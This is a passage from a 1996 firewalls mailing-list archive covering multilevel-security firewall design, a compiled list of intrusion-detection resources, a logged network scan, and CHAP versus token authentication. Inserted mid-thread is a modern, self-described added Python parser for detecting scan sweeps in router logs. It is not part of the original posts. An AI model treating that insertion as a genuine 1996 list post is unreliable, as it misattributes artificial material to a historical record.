Even within the classification, everyone in a particular division cleared at that level doesnt get access and different data items at 'Secret' have different sensitivities. MLS just reflects that set of requirements. Not all systems which meet B1 levels and have MLS capability to meet the MAC requirements work in exactly the same way. Every firewall should be built to meet the specific requirements of the organisation it serves to protect. Therefore two firewalls might employ the same basic technology but be configured very differently. Some government users employ gateways with MLS type technology where the technology simply provides two compartments which are protected from each other. Moving data from one compartment to the other is under manual control and there are only two conditions - untrusted public and trusted internal sensitive. Other users employ the technology, together with additional technology, to allow a level of automation but still have only two levels. Some users employ the same technology in a largely automated manner where several levels apply on both sides of the wall. In all these cases the systems could be described as firewalls, only one of them really employs MLS widely, but all of them make use of the fact that the technology has been extensively tested through independent evaluation and active penetration testing and has a known behaviour. In most cases, the certification of components is only one part of the measurement and site accreditation has been employed to ensure that the complete system (and that means all of the procedures and the administration) complies with a carefully analysed risk assessment and risk policy. In commercial application, and increasingly in government applications for that matter, one problem is that two or more people may need to exchange sensitive data but do not use the same classification systems. 
For example, a corporation may have its own classification system which includes lables like 'Company Confidential'. It needs to exchange data with another enterprise which may also use the same lables but use the labels in a very different way and mean very different things. Equally, it might not even use the same terms in any way. Evaluation criteria assume that classification is under a central control and common through all linked systems and their links. If not the only data exchange permitted is at 'Unclassified'. Once 'Unclassified' data has been moved internally to a classified level, it can only move down again if the security officer declassifies it. Therefore in a firewalling sense, data is received from an external source at 'unclassified' but is then moved into a work area at 'Company Confidential'. The internal user then wants to respond by email but is stopped by the system because he is attempting to take what is now classified data to an unclassified only destination. To achieve transmission, the internal user has to permit the security officer to decide if an exception can be granted. Where the technology is very useful is that all of this process is tracked by the trusted audit system. If in the process General Motors discloses highly sensitive information to Ford Motor Company because a security officer made the wrong decision, it is possible to identify who was responsible and when. Given that information damage limitation may be possible and sanctions can reduce the probability of the situation being repeated. In a situation such as the example, it would not make sense to build a firewall which automatically allowed classified data to pass automatically from A at 'Company Confidential' to B at 'Company Confidential'. That does not mean that a firewall with MLS technology is inappropriate. It just means that the designers and administrators have to decide how they should use the technology and also why they should use it. 
A number of military systems over the years have failed because someone decided to specify B1 certified product because X% of data was classified at 'Secret'and assumed that that was all they needed to do. MLS can be employed to cover the same applications as TE and TE can cover applications covered by MLS. Which you choose depends on your own detailed assessment of need. Which product containing MLS you choose also depends on your assessment of need and factors like cost. How you implement MLS also depends on your requirements. The fact that the technology allows you to set a number of classification and sensitivity levels doesnt mean you have to do it that way. You would typically employ at least two levels in a firewall but you could use many more and they dont have to match on both sides. One use is to take data from the untrusted public domain into a protection compartment. You might then have it move into a sanitation compartment where it is automatically checked for hostile code. If it looks hostile, someone decides what to do with it and it only moves from there under manual control. It is still on the 'outside', but you already have two compartments. Automatic transfer across the primary barrier may be nothing more than a method of saying the data has been checked for obvious risks but is still untrusted. OTOH you could extend the use of the technology with combinations of system or manual checks to create an MLS environment inside. You may also be able to pass data in and out between known external addresses using the label system you use internally and this may include the use of other mechanisms to provide a level of protection (such as encryption) to the data as it transits the public untrusted networks. The choices are almost unlimited. This makes a real risk policy an essential. Alternatively you can take a simple firewall approach and assume inside is trusted and outside is untrusted but that will one day give you an unpleasant surprise. 
Ian J-B ========================================= Ian Johnstone-Bryden, Rayzarb Associates Tel: +44 (0)1986 782418 Fax: +44 (0)1986 782525 Email: gq50@dial.pipex.com +++++++++++++++++++++++++++++++++++++++++ Latest book by Ian Johnstone-Bryden "Managing Risk", Avebury Imprint ISBN 1 85972 255 5 Library of Congress CICs No. 95-79002 ========================================= From firewalls-owner Fri Feb 2 14:25:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA16865 for firewalls-outgoing; Fri, 2 Feb 1996 12:48:12 -0800 (PST) Received: from gw3.att.com (gw4.att.com [204.179.186.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA20793 for ; Thu, 1 Feb 1996 08:50:02 -0800 (PST) Received: from vodka.sse.att.com (vodka.gc.att.com) by ig4.att.att.com id AA04337; Thu, 1 Feb 96 11:41:46 EST Message-Id: <9602011641.AA04337@ig4.att.att.com> From: mdr@vodka.sse.att.com Subject: Intrustion Detection References for all To: firewalls@greatcircle.com Date: Thu, 1 Feb 1996 11:48:28 -0500 (EST) X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Since I received so many requests for the results of my query I decided to reply to the general list. My future postings about this subject will be done to ids@uow.edu.au where I should have originally posted. I deleted a few responses that were personal invitations from individuals because I thought that it would be inappropriate to post those to the list. Many thanks again to those who responded. Mark Riggins Secure Systems Engineering AT&T Bell Labs ==================================================================== Hi, > On Mon, 22 Jan 1996, Fred Cohen wrote: > I do know DIDS. It is not a commercial product and is not generally > available. 
It does an admirable job, but it is resource intensive (cpu > cycles, disk space, and operator and analyst time). Even if it were > available, it would not be a solution for very many sites. How does one obtain it? > However, Phillipe Langlois > mentioned one developed in France. Perhaps he could summarize this > product for our edification?? IDERS is a product (under permanent improvement) which collects data from numerous probes at various subsystems (network, file system, process use, commands, data contained in files...). The probes report data to a central program which tries to make clear and understandable reports. It tries to detect fuzzy attacks which are not often detected with normal tools. IDERS is a commercial _service_, it's not sold but installed for our clients as a tool for our security service. PhiL. -- Philippe Langlois INTRINsec - Securite informatique Philippe.Langlois@INTRINsec.com - http://www.INTRINsec.com ==================================================================== From: "Lisa M. Jaworski" Content-Type: text Content-Length: 339 Status: RO Mark, I just received info from SAIC regarding its intrusion detection product. It's called CMDS (Computer Misuse Detection System) & the POC is Paul Proctor (proctor@mls.saic.com). The marketing literature comes with a slew of paperwork, including a paper on audit reduction & misuse detection in heterogeneous environments. Lisa J. ==================================================================== From: Mark_W_Loveless@smtp.bnr.com Message-Id: <9600298229.AA822944324@smtp.bnr.com> To: mark.riggins@att.com Subject: Re: intrusion detection Content-Type: text Content-Length: 1229 Status: RO Try the alt.2600 FAQ via anon ftp at rtfm.mit.edu /pub/usenet-by-group/alt.2600 There is a fairly complete list of hacker hangouts, security newsgroups, mailing lists, and a ton of web links (assuming the latest version is out there, it was recently updated in the last couple of months). 
Bear in mind it is written from the perspective of the guys you want to keep out of your system. ==================================================================== From: Alan Dowd To: mark.riggins@att.com Subject: Re: intrusion detection In-Reply-To: <9601252031.AA04494@ig1.att.att.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Length: 1391 Status: RO Greetings, Mark! The obvious, obvious is Fred Cohen's web site. One may not like the way he posts, but he does do a lot of consulting work on intrusion detection/prevention. I don't have his URL handy, but he writes to Best of Security and posts the URL in his sig block. Other obvious, obvious is NCSA - the security folk at www.ncsa.com, not the super-computer folk. There is a list of maillists at http://www.iss.net/iss/maillist.html - Intruder Detection is described there. Good Luck, -- Alan Dowd Phone: +1 612 628 1641 Secure Computing Corporation FAX: +1 612 628 2701 2675 Long Lake Road URL: http://www.sctc.com Roseville, MN 55113-2536 E-Mail: dowd@sctc.com -- ==================================================================== From: "Lisa M. Jaworski" Content-Type: text Content-Length: 319 Status: RO Mark, Are you familiar with the work that Teresa Lunt was doing when she was at SRI? She is now a Program Mgr at ARPA (try lunt@arpa.gov but I'm not sure if that's right.) Also, Christopher Klaus cklaus@iss.net. SAIC has a product out now, too. Check out their web pages for more info & a POC. Take care, Lisa J. ==================================================================== From: Torsten Sturm Organization: CSD, Univ. 
Erlangen-Nuernberg, Germany X-Mailer: Mozilla 2.0b5 (X11; I; SunOS 4.1.3 sun4m) Mime-Version: 1.0 To: mark.riggins@att.com Original-Cc: firewalls@greatcircle.com Subject: Re: intrusion detection References: <9601252031.AA04494@ig1.att.att.com> Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Content-Type: text/plain; charset=us-ascii Content-Length: 1034 Status: RO The COAST Projects are somewhat dedicated to various flavours of intrusion detection and are always a good starting point ! http://www.cs.purdue.edu/coast/coast-tools.html HTH, Torsten -- InfoSec webpage : http://www.rrze.uni-erlangen.de/~unrzg3/security/security.html __________________________________________________________________ http://wwwcip.informatik.uni-erlangen.de/user/tnsturm/index.html ==================================================================== 
From: Darren Reed Subject: Re: intrusion detection To: mdr@vodka.sse.att.com Date: Mon, 29 Jan 1996 21:19:39 +1100 (EDT) In-Reply-To: <9601261408.AA24513@ig2.att.att.com> from "mdr@vodka.sse.att.com" at Jan 26, 96 09:09:02 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1042 Status: RO In some mail from mdr@vodka.sse.att.com, sie said: > > Do you have reach info for Omniguard? not handy, but will see what I can do. > > Omniguard distribute a suite of programs on a single CD-ROM, one of which > > is supposedly an intrusion detection program. I say supposedly because > > I've not had a valid license key to do anything useful with it. > > > > darren > > ==================================================================== From: Jordan Hayes Message-Id: <199601262322.PAA25215@Thinkbank.COM> To: mdr@vodka.sse.att.com Subject: Re: intrusion detection Content-Type: text Content-Length: 356 Status: RO From: mdr@vodka.sse.att.com Subject: Re: intrusion detection To: jordan@thinkbank.com (Jordan Hayes) Do you have a reach number or email address or something to help me reach them? > > There's a group at UC Davis doing this. Jeremy Frank is one of the > people involved. > > /jordan > Try Jeremy Frank ... 
/jordan ==================================================================== From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Message-Id: <199601262115.QAA17839@bwface.bwh.harvard.edu> Subject: Re: intrusion detection To: mark.riggins@att.com Date: Fri, 26 Jan 1996 16:15:09 -0500 (EST) In-Reply-To: <9601252031.AA04494@ig1.att.att.com> from "mdr@vodka.sse.att.com" at Jan 25, 96 03:34:09 pm X-Pgp: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Content-Length: 745 Status: RO Some of Spaf's students at COAST have papers. Adam ==================================================================== From: gilsinn@cam.nist.gov (Judith F Gilsinn) Message-Id: <9601261446.AA00755@trumpet.cam.nist.gov> To: mdr@vodka.sse.att.com Subject: Intrusion detection mailing list Content-Type: text Content-Length: 281 Status: RO I have a year old reference to an intrusion detection mailing list. Send mail to majordomo@uow.edu.au with subscribe ids in the message body. Since I don't subscribe to this list, I don't know its status, but you might want to try it. Judy Gilsinn NIST Computer Security Officer ==================================================================== From: "Steve Lodin" Message-Id: <9601260941.ZM29056@narnia.cs.purdue.edu> Date: Fri, 26 Jan 1996 09:41:24 -0500 In-Reply-To: Darren Reed "Re: intrusion detection" (Jan 26, 4:41pm) References: <199601260541.VAA07236@miles.greatcircle.com> On Jan 26, 4:41pm, Darren Reed wrote: > > Omniguard distribute a suite of programs on a single CD-ROM, one of which > is supposedly an intrusion detection program. I say supposedly because > I've not had a valid license key to do anything useful with it. > If you are talking about the Axent Omniguard suite of tools, there is a product called Intruder Alert (ITA). 
I just installed a temporary license for the COAST lab the other day. It looks like a simple syslog watcher from my limited experience with it. Steve -- Steve Lodin Purdue - swlodin@cs.purdue.edu http://www.cs.purdue.edu/people/swlodin Delco Electronics - swlodin@delcoelect.com (317)451-0479 Home - swlodin@iquest.net http://www.iquest.net/~swlodin/ ==================================================================== From: stevenf@goodnet.com (Steven Fullmer) Subject: Re: intrusion detection Content-Type: text/plain; charset="us-ascii" Content-Length: 780 Status: RO CommerceNet at http://www.commerce.net has an electronic jump station. Go to the "security" section and use it as a jumping off point. **was a good start when I wrote the page 5 months ago???*** ========================================================================= From: K.T.Khoo@iti.salford.ac.uk Date: 26 Jan 96 13:55 Hi, I am a PhD student working on IT security, esp. on PKI, although my interest is on intrusion detection . . . . You may find quite some good papers on the said topic, esp. 'An Application of Pattern Matching in Intrusion Detection' from: http://www.cs.purdue.edu//coast/coast-library.html Do keep in touch. Cheers! Vincent Khoo ==================================================================== From: Darren Reed Subject: Re: intrusion detection Omniguard distribute a suite of programs on a single CD-ROM, one of which is supposedly an intrusion detection program. I say supposedly because I've not had a valid license key to do anything useful with it. darren ==================================================================== From: Ron DuFresne To: mdr@vodka.sse.att.com Mark, You prolly have already done so, but you can do a web search on 'mitnick' and come up with tons of info, don't expect much from yahoo, but lycos will keep you busy for a full day at least. And not all the info is mitnick oriented. 
Also, you may wish to exchange some private mails with Ray Kaplan from the list here, he has some very good insights as to this perspective. In the same token, I would be interested in seeing the 'workbench' you are able to piece together. Thanks, my best to you and yours, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. ==================================================================== From: garland@gatekeeper.cb.att.com To: mark.riggins@att.com Hi Mark, Intrusion detection... here are a few quick notes. These are all public domain. more details available upon request, including URLs. sorry for the terse message. I am on a rather convoluted link, that includes dialup from a hotel, ppp, an Internet connection, and a GUARD connection into AT&T. COPS by Dan Farmer is a reasonable system scanner. tiger is another similar tool. tripwire, with md5, and binaudit scan for changes to the file system. swatch is a tool that analyzes log files. There are a few other tools that scan a system from the outside. They are basically portscanners, with some intelligence built in. ISS, nfsbug, SATAN are examples. Chris ==================================================================== From: swlodin@cs.purdue.edu (Steve Lodin) Message-Id: <199601260243.VAA27520@narnia.cs.purdue.edu> Subject: Re: intrusion detection This may be obvious, but have you checked the COAST Archive? I know we have about 5 IDS papers there. Check the COAST Web page also (http://www.cs.purdue.edu/coast) because the group is working on a project called IDIOT (Intrusion Detection In Our Time). Alternatively, there has been much IDS research at UC Davis. 
Steve -- Steve Lodin Purdue - swlodin@cs.purdue.edu http://www.cs.purdue.edu/people/swlodin Delco Electronics - swlodin@delcoelect.com (317)451-0479 Home - swlodin@iquest.net http://www.iquest.net/~swlodin/ ==================================================================== From: Jordan Hayes Message-Id: <199601260153.RAA15092@Thinkbank.COM> To: mdr@vodka.sse.att.com Subject: Re: intrusion detection Content-Type: text Content-Length: 94 Status: RO There's a group at UC Davis doing this. Jeremy Frank is one of the people involved. /jordan ==================================================================== Have you tried looking at the ids list? ids@uow.edu.au (use the -request form to subscribe). Ben. ____ Ben Samman..............................................samman@cs.yale.edu "If what Proust says is true, that happiness is the absence of fever, then I will never know happiness. For I am possessed by a fever for knowledge, experience, and creation." -Anais Nin PGP Encrypted Mail Welcomed Finger samman@powered.cs.yale.edu for key Want to give a soon-to-be college grad a job? Mail me for a resume ==================================================================== From: Jim Cannady Subject: Re: Network Intrusions Content-Type: text/plain; charset="us-ascii" Content-Length: 2022 Status: RO Hi Mark, Yeah, I got more reference material than my desk can stand at the moment!! I've been collecting this stuff for the past couple of years, and I'm sure that I've got close to everything that's been published on the topic in a refereed journal. Let me know your specifics and I'll see what I can find. 
Jim >> ================================== >> James Cannady | >> Research Scientist | >> Georgia Institute of Technology | >> GTRI/ITL/CSITD | >> James.Cannady@gtri.gatech.edu | >> (404) 894-9730 | >> ================================== ==================================================================== From: jim@SmallWorks.COM (Jim Thompson) Message-Id: <9511292047.AA10059@hosaka.smallworks.com> To: cibir@netcom.com Subject: Re: Intruder & Analysis Software Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Content-Type: text Content-Length: 47 Status: RO 'Stalker' from Haystack Labs, in Austin, TX From firewalls-owner Fri Feb 2 14:40:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA19393 for firewalls-outgoing; Fri, 2 Feb 1996 13:51:47 -0800 (PST) Received: from mbunix.mitre.org (mbunix.mitre.org [129.83.20.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA19358 for ; Fri, 2 Feb 1996 13:51:11 -0800 (PST) Received: from qmgate.mitre.org (qmgate.mitre.org [129.83.100.120]) by mbunix.mitre.org (8.6.10/8.6.9) with SMTP id QAA20413 for ; Fri, 2 Feb 1996 16:49:51 -0500 Message-ID: Date: 2 Feb 1996 16:46:33 -0500 From: "Dan Vukelich" Subject: Survey To: "Firewalls Great Circle" X-Mailer: Mail*Link SMTP-QM 3.0.2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Subject: Time:4:48 PM OFFICE MEMO Survey Date:2/2/96 I'm new to the firewalls list, so please bear with me. First, what I'm looking for is an independent study of firewall products, with columns such as "provides packet filtering," "supports IPX," etc. Second, several years back, a government or educational site was (ab)used as an FTP dumping ground for such things as pornography and bootlegged software; does anyone recall this or have any information they can pass on to me? 
Danny From firewalls-owner Fri Feb 2 14:55:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA19878 for firewalls-outgoing; Fri, 2 Feb 1996 14:11:59 -0800 (PST) Received: from uucp-1.csn.net (uucp-1.csn.net [199.117.27.26]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA19854 for ; Fri, 2 Feb 1996 14:11:11 -0800 (PST) Received: from bacchus.UUCP (uucp@localhost) by uucp-1.csn.net (8.6.12/8.6.12) with UUCP id PAA24532 for greatcircle.com!Firewalls; Fri, 2 Feb 1996 15:09:05 -0700 From: Shawn Steele Message-Id: <9602021504.ZM20514@aob.org> Date: Fri, 2 Feb 1996 15:04:47 -0700 In-Reply-To: firewalls-digest-owner@greatcircle.com "Firewalls-Digest V5 #78" (Feb 1, 2:00pm) References: <199602012200.OAA02128@miles.greatcircle.com> X-Mailer: Z-Mail Lite (3.2.0 26may94) To: Firewalls@greatcircle.com Subject: Re: Scanning from afar... Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Has anyone seen this type of network scanning before? Addresses have > been changed to protect the innocent and the guilty. > > Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp > X.X.143.14(39620) -> X.X.211.227(80), 1 packet Maybe it's a webbot gone mad that wants to index the web REALLY thoroughly. I wonder why they're only checking every 16th machine? - shawn Shawn Steele Webmaster Information Systems Administrator Association of Brewers (303) 447-0816 x 118 (voice) 736 Pearl Street (303) 447-2825 (fax) PO Box 1679 shawn@aob.org (e-mail) Boulder, CO 80306-1679 info@aob.org (aob info) U.S.A. http://www.aob.org/aob (web) Note: When replying to my messages, please include enough of my message so that I know what you're replying to! 
:-) From firewalls-owner Fri Feb 2 15:53:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA24491 for firewalls-outgoing; Fri, 2 Feb 1996 15:31:36 -0800 (PST) Received: from [198.102.244.97] (pb520-ppp.greatcircle.com [198.102.244.97]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA24465; Fri, 2 Feb 1996 15:31:26 -0800 (PST) X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 2 Feb 1996 18:31:47 +0100 To: Ray Hooker , "'Firewall Mailing List'" From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Does SMTP allow security breaches. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 12:14 PM 1/31/96, Ray Hooker wrote: >The best way to answer the question about SENDMAIL is to simply point to >the fact that the program is like 6000 lines long and has a long history of >problems. I _wish_ it was only 6000 lines long... Try more like 30,000, last I checked... I don't know if it's gotten longer or shorter lately. -Brent ----------------------+----------------------------+------------------------ Brent Chapman | Great Circle Associates | 1057 West Dana Street Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041 ----------------------+----------------------------+------------------------ Internet Tutorials from the Experts! 
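The Cisco access-list deny line quoted in Shawn Steele's "Scanning from afar..." reply above is the kind of record a defender would aggregate rather than read one at a time: a single denied packet means little, but one source touching many hosts on the same port, at a fixed address stride, is the "every 16th machine" pattern Shawn noticed. The following is an added example and is not code from any post on this list. It is a small Python parser for %SEC-6-IPACCESSLOGP lines that groups denied hits by source and destination port, flags sources that reached several distinct hosts, and reports a constant stride between the sorted target addresses. The log lines are constructed for the example using documentation-range addresses, and the threshold and function names are assumptions of the example.

```python
import re
from collections import defaultdict
from ipaddress import ip_address

# Constructed sample log, modelled on the IOS line quoted in the thread.
# Addresses are from the documentation ranges (RFC 5737), not real hosts.
SAMPLE_LOG = """\
Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39620) -> 198.51.100.3(80), 1 packet
Jan 30 11:14:42.105: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39621) -> 198.51.100.19(80), 1 packet
Jan 30 11:14:42.301: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39622) -> 198.51.100.35(80), 1 packet
Jan 30 11:14:42.498: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39623) -> 198.51.100.51(80), 1 packet
Jan 30 11:14:42.700: %SEC-6-IPACCESSLOGP: list 111 denied tcp 192.0.2.14(39624) -> 198.51.100.67(80), 1 packet
Jan 30 11:15:03.010: %SEC-6-IPACCESSLOGP: list 111 denied tcp 203.0.113.7(1055) -> 198.51.100.20(25), 1 packet
Jan 30 11:15:09.442: %SEC-6-IPACCESSLOGP: list 111 permitted tcp 203.0.113.9(2048) -> 198.51.100.8(80), 3 packets
""".splitlines()

# Field layout of an IOS "IPACCESSLOGP" (TCP/UDP with ports) access-list log message.
ACL_LOG_RE = re.compile(
    r"%SEC-6-IPACCESSLOGP: list (?P<acl>\S+) (?P<action>permitted|denied) (?P<proto>\w+) "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\((?P<sport>\d+)\) -> "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\((?P<dport>\d+)\), (?P<count>\d+) packets?"
)


def parse_acl_log(line):
    """Return the fields of one ACL log line as a dict, or None if the line
    is not an IPACCESSLOGP record."""
    m = ACL_LOG_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    for key in ("sport", "dport", "count"):
        rec[key] = int(rec[key])
    return rec


def find_sweeps(lines, min_targets=4):
    """Group denied hits by (source, protocol, destination port) and flag
    sources that touched at least min_targets distinct destinations.
    For each finding, report the address stride if the sorted targets are
    evenly spaced (None when they are not)."""
    targets = defaultdict(set)
    for line in lines:
        rec = parse_acl_log(line)
        if rec is None or rec["action"] != "denied":
            continue  # ignore non-ACL lines and permitted traffic
        targets[(rec["src"], rec["proto"], rec["dport"])].add(rec["dst"])

    findings = []
    for (src, proto, dport), dsts in targets.items():
        if len(dsts) < min_targets:
            continue
        addrs = sorted(int(ip_address(a)) for a in dsts)
        gaps = {b - a for a, b in zip(addrs, addrs[1:])}
        stride = gaps.pop() if len(gaps) == 1 else None
        findings.append({"src": src, "proto": proto, "dport": dport,
                         "targets": len(dsts), "stride": stride})
    return findings


if __name__ == "__main__":
    for f in find_sweeps(SAMPLE_LOG):
        print(f"{f['src']} -> {f['targets']} hosts on {f['proto']}/{f['dport']}, "
              f"stride {f['stride']}")
```

On the constructed sample this reports one source hitting five hosts on tcp/80 with a stride of 16 and ignores the lone SMTP hit and the permitted connection. Note that the IOS log line is itself rate-limited and summarises packet counts, so the "1 packet" figure is not a reliable count of probes; the number of distinct destinations per source is the more useful signal.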
From firewalls-owner Fri Feb 2 16:24:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA28094 for firewalls-outgoing; Fri, 2 Feb 1996 16:11:26 -0800 (PST) Received: from wicked.neato.org (wicked.neato.org [198.70.96.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA28076 for ; Fri, 2 Feb 1996 16:11:16 -0800 (PST) Received: (from george@localhost) by wicked.neato.org (8.7.2/8.6.12) id QAA07610; Fri, 2 Feb 1996 16:11:28 -0800 (PST) Date: Fri, 2 Feb 1996 16:11:28 -0800 (PST) Message-Id: <199602030011.QAA07610@wicked.neato.org> From: George Mullins To: mjr@v-one.com cc: firewalls@greatcircle.com Subject: Re: SSL and S-HTTP Proxy Status (as of 11 January 1996) In-Reply-To: <199601300002.TAA21978@clark.net> References: <199601291747.MAA02785@argon.ncsc.mil> <199601300002.TAA21978@clark.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus J. Ranum writes: > David P. Kemp > > >So, I sympathize with the sentiment that TIS should either put some > >effort into maintaining fwtk, or release it so that a net-fwtk could > >be maintained by the user community. > > Wait a minute -- are you asking TIS to keep spending money > to keep giving you free firewalls? > No I don't think that is what he is asking. I think that David was saying that if TIS isn't planning on doing anything further with the toolkit then why don't they release the code into the public domain or copy-left and let the community support it - after all it was (at least partly) developed under a DARPA contract at TAX PAYERS expense and should therefore belong to the TAX PAYERS and not TIS. > I just want to make sure that's what you're asking. Because > I have been thinking of moving to a big house in the countryside, > with space for a darkroom, and I think it's only fair that you help > chip in on my mortgage. Because it would be ever so convenient for > me not to have to pay it myself. I just want to make sure what you're saying. 
TIS built this nice big house in the country with space for a nice office where they could do business and the government paid them to build the house and now they decide who will use the house and how. While it seemed awfully magnanimous that TIS was giving away the toolkit, it seems that under the DARPA contract they had to give it away - not because they were just nice guys - and at the same time they could restrict use of the code to non-competitive/non-commercial products. Seems like a pretty good deal that TIS got given by DARPA. -george From firewalls-owner Fri Feb 2 16:38:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA28009 for firewalls-outgoing; Fri, 2 Feb 1996 16:10:24 -0800 (PST) Received: from netcom.netcom.com (netcom.netcom.com [192.100.81.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA27988 for ; Fri, 2 Feb 1996 16:10:17 -0800 (PST) Received: by netcom.netcom.com (8.6.12/Netcom) id PAA16376; Fri, 2 Feb 1996 15:36:35 -0800 Date: Fri, 2 Feb 1996 15:36:32 -0800 (PST) From: Bob Bosen Subject: Re: CHAP Authentication To: nicholscs@agedwards.com cc: firewalls@greatcircle.com In-Reply-To: <1996Feb02.132500.1093.27907@igate.agedwards.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 2 Feb 1996 nicholscs@agedwards.com wrote: > > This is a general security related question relating to incoming > communications into a router. Specifically a remote user dialing into a > router attached to an applications server. > > I have to make an argument comparing/contrasting the security levels between > CHAP authentication and Token Authentication. The argument has been > successfully made that Token authentication is generally considered to > provide superior authentication. From a management viewpoint the question > becomes - CHAP is basically free (manhours and implementation) vs. 
Token > which can be expensive - therefore tell us why CHAP is inferior to Tokens > for perimeter security? > > What threats does CHAP pose? Has CHAP been successfully penetrated? By > what methods? > > I have read the RFC's on PPP and Authentication but am still unable to apply > this to a real world threat. > > Thanks, > > Chris > nicholscs@agedwards.com > > > > > CHAP is usually implemented to provide "node" authentication. It gives a reliable indication of the node from which an access request originates (or the nearest link in some cases.) You can generally determine whether CHAP goes beyond node authentication by asking yourself this question: "Does the authorized user get personally involved in this CHAP signon (by entering a PIN or somesuch) every time access is requested?" If the answer to that question is "no", then your CHAP implementation is probably being performed automatically by the routers or commserver equipment involved at both ends of the links being authenticated. This is the usual and conventional way that CHAP has come to be used. "Token-based" authentication is generally much more personal. The individual user is directly involved in operating the authenticator and usually has to enter a PIN or at least an additional password, every time. You know he's there, alive and thinking. It's less convenient, but more secure. Now let's look at a typical scenario: Suppose your Commserver implements CHAP authentication transparently and you allow your employees to telecommute into your LAN. Now suppose one or more of your employees has teenaged kids that know how to operate a computer. When your router authenticates your employee's computer in his home, it can't tell whether it's your employee or his teenaged sibling knocking on the door. Now suppose your employee has a LAN in his home. How good is that security? Does his LAN reach out to other LANs? Can his modem slip or ppp out to a commercial Internet provider? 
Have you just joined your corporate network with the entire world? With the usual transparent CHAP implementations, you should probably be worrying about all of the above. With token-based authentication, you can reasonably tell your employee that every time a session begins between your corporate LAN and his PC (or home LAN), you know he will be personally present, and you can hold him personally responsible for the reasonable activities he is expected to perform, until he takes the link down. If he also uses that token when at the office, you can be reasonably sure he'll keep it with him wherever he goes. That will deny access to your LAN from his kids or from whoever can hop through his PC while he's not there. That's the way I see it (and I'm biased!) Regards, Bob Bosen Enigma Logic Inc. 2151 Salvio St. #301 Concord, CA 94520 USA Tel: +1 510 827-5707 Internet: bbosen@netcom.com http://www.safeword.com ftp://ftp.safeword.com/download/ ************************************************************************** * "It wasn't me!!! Somebody must have captured my username/password!!!" 
* ************************************************************************** From firewalls-owner Fri Feb 2 17:38:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA02868 for firewalls-outgoing; Fri, 2 Feb 1996 17:30:15 -0800 (PST) Received: from gauntlet-1.trusted.com (gauntlet-1.trusted.com [204.254.155.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA02854; Fri, 2 Feb 1996 17:30:10 -0800 (PST) Received: by gauntlet-1.trusted.com; id UAA25021; Fri, 2 Feb 1996 20:35:46 -0500 Received: from hilo.trusted.com(10.0.1.126) by gauntlet-1.trusted.com via smap (V3.1) id xma025017; Fri, 2 Feb 96 20:35:26 -0500 Received: from localhost by hilo.trusted.com with SMTP (1.37.109.4/16.2) id AA17428; Fri, 2 Feb 96 20:28:20 -0500 Message-Id: <9602030128.AA17428@hilo.trusted.com> To: Brent@greatcircle.com (Brent Chapman) Cc: firewalls@greatcircle.com Subject: Re: Does SMTP allow security breaches. In-Reply-To: Your message of "Fri, 02 Feb 1996 18:31:47 EST." Date: Fri, 02 Feb 1996 20:27:55 EST From: "Rick Murphy" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I _wish_ it was only 6000 lines long... Try more like 30,000, last I >checked... I don't know if it's gotten longer or shorter 